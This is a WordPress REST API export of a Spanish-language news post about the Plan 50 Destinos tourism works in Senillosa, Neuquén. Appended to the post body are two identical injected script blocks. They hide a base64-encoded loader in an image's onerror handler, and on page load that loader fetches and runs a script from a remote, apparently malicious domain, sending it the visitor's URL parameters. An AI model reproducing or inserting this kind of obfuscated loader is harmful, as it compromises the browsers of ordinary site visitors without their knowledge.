{"id":3237,"date":"2023-11-01T11:32:30","date_gmt":"2023-11-01T14:32:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3237"},"modified":"2025-08-14T00:06:19","modified_gmt":"2025-08-14T03:06:19","slug":"avanza-50-destinos-en-neuquen","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3237","title":{"rendered":"Avanza 50 Destinos en Neuqu\u00e9n"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Autoridades nacionales y provinciales recorrieron obras en Senillosa.<\/em><\/h3>\n\n\n\n<p>El subsecretario de Relaciones Institucionales y Cooperaci\u00f3n Internacional,&nbsp;<strong>Leandro Balasini<\/strong>; junto con el gobernador del Neuqu\u00e9n,&nbsp;<strong>Omar Guti\u00e9rrez<\/strong>; y el ministro de Turismo provincial,&nbsp;<strong>Sandro Badilla<\/strong>, visitaron el&nbsp;<strong>nuevo Parador Gastron\u00f3mico en la Costanera de Senillosa<\/strong>, un atractivo que busca seguir ampliando la oferta tur\u00edstica local.<\/p>\n\n\n\n<p>La obra realizada en el marco del&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/50-destinos\">Plan 50 Destinos<\/a>&nbsp;contempla un parador con tres contenedores alcanzando una superficie cubierta de 58,88 m\u00b2. Est\u00e1 conformado por una confiter\u00eda con cocina, dep\u00f3sito, sanitarios y una terraza con equipamiento (bancos y mesas). Es&nbsp;<strong>una de las 20 obras llevadas adelante en la provincia<\/strong>&nbsp;tras una inversi\u00f3n de $339 millones.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2023-10-31_at_12.56.54.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p><em>\u00abNos pone muy felices la concreci\u00f3n de cada proyecto porque refleja el trabajo conjunto entre Naci\u00f3n y las distintas provincias. Seguimos impulsando la infraestructura tur\u00edstica a lo largo y a lo ancho del pa\u00eds porque estamos convencidos del rol fundamental que cumple el sector en el desarrollo de la Argentina\u201d,<\/em>&nbsp;expres\u00f3 Balasini.<\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes de la Naci\u00f3n est\u00e1 llevando adelante el\u00a0<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/50-destinos\" target=\"_blank\" rel=\"noopener\" title=\"\">Plan \u201c50 Destinos\u201d<\/a>\u00a0para\u00a0<strong>dinamizar, fortalecer y ampliar la oferta tur\u00edstica<\/strong>\u00a0en destinos emergentes y consolidados de todo el pa\u00eds. Contempla una inversi\u00f3n de m\u00e1s de\u00a0<strong>$7200 millones<\/strong>\u00a0con m\u00e1s de\u00a0<strong>230 obras<\/strong>\u00a0en marcha, generando m\u00e1s de\u00a0<strong>34 mil empleos<\/strong>\u00a0a nivel federal.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Autoridades nacionales y provinciales recorrieron obras en Senillosa. El subsecretario de Relaciones Institucionales y Cooperaci\u00f3n Internacional,&nbsp;Leandro Balasini; junto con el gobernador del Neuqu\u00e9n,&nbsp;Omar Guti\u00e9rrez; y el ministro de Turismo provincial,&nbsp;Sandro Badilla, visitaron el&nbsp;nuevo Parador Gastron\u00f3mico en la Costanera de Senillosa, un atractivo que busca seguir ampliando la oferta tur\u00edstica local. La obra realizada en el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3238,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,18],"tags":[],"class_list":{"0":"post-3237","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3237"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3237"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3237\/revisions"}],"predecessor-version":[{"id":6933,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3237\/revisions\/6933"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3238"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3237"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3237"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3237"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}